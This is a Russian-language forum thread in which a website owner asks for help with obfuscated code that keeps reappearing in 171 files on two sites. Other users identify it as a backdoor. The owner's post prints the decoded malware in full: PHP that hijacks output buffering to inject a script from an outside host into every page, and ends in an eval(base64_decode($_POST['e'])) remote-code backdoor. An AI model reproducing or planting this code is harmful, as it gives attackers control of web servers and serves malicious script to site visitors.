вредный код

Печать RSS
576

Автор
Пацак
0
народ помогите. беда у меня. обнаружил код зашифрованный. его там раньше не было. в каждом кайфиг этот код. я все проверил и почистил. сменил пароль. вчера целый день норм было сегодня повторилось. у меня 2 сайта на одном аке и в обоих ткое. как узнать как попадает этот код?
К

Пришелец
0
какие скрипты ставил? И хост какой..
Изменил: Константин (13.06.2010 / 12:34)

Оранжевые штаны
0
Ты код покажи а мы разберёмся smile
К

Пришелец
0
Studentsov (Сегодня / 12:34)
Ты код покажи а мы разберёмся smile
тогда сразу и бутылку.smile
Автор
Пацак
0
2 на одном соцка стоит давно уже. дыр нет в ней. на втором зц это началось после того как поставил зц вот этот код расшифрованый if(!function_exists('zc9')){function zc9($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0]as$v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(httpsmile ?//([^>]*?)>#is',$s,$a))foreach($a[0]as$v)if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL2wtd2lzZS5jby5qcC9zdXBlci1qc2Evcm9nb19tbGQucGhwID48L3NjcmlwdD4='),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s,1);elseif(strpos($s,'<a'))$s=$a.$s;return$s;}function zc92($a,$b,$c,$d){global$zc91;$s=array();if(function_exists($zc91))call_user_func($zc91,$a,$b,$c,$d);foreach(@ob_get_status(1)as$v)if(($a=$v['name'])=='zc9')return;elseif($a=='ob_gzhandler')break;else$s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('zc9');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$zc9l=(($a=@set_error_handler('zc92'))!='zc92')?$a:0;eval(base64_decode($_POST['e'])
К

Пришелец
0
может стоит скрипт который перезаписывает файлы..

Оранжевые штаны
0
Бэкдор это
eval(base64_decode($_POST['e']))
Автор
Пацак
0
skamsk (Сегодня / 12:42)
может стоит скрипт который перезаписывает файлы..
скорее всего потому что этот код в 171 файле. в ручную не реально каждый день его вставлять. ну если конечно него терпения нет.
Автор
Пацак
0
skamsk (Сегодня / 12:39)
странно.. Вот тут тоже один эмо на мой хост жаловался с такой же проблемой.мол я вставляю ему свой код..
я не жалуюсь на него я же написал что к хосту вопросов нет.
К

Пришелец
0
Studentsov (Сегодня / 12:43)
Бэкдор это
натуре D
Стикеры / Теги / Правила / Топ тем / Топ постов / Поиск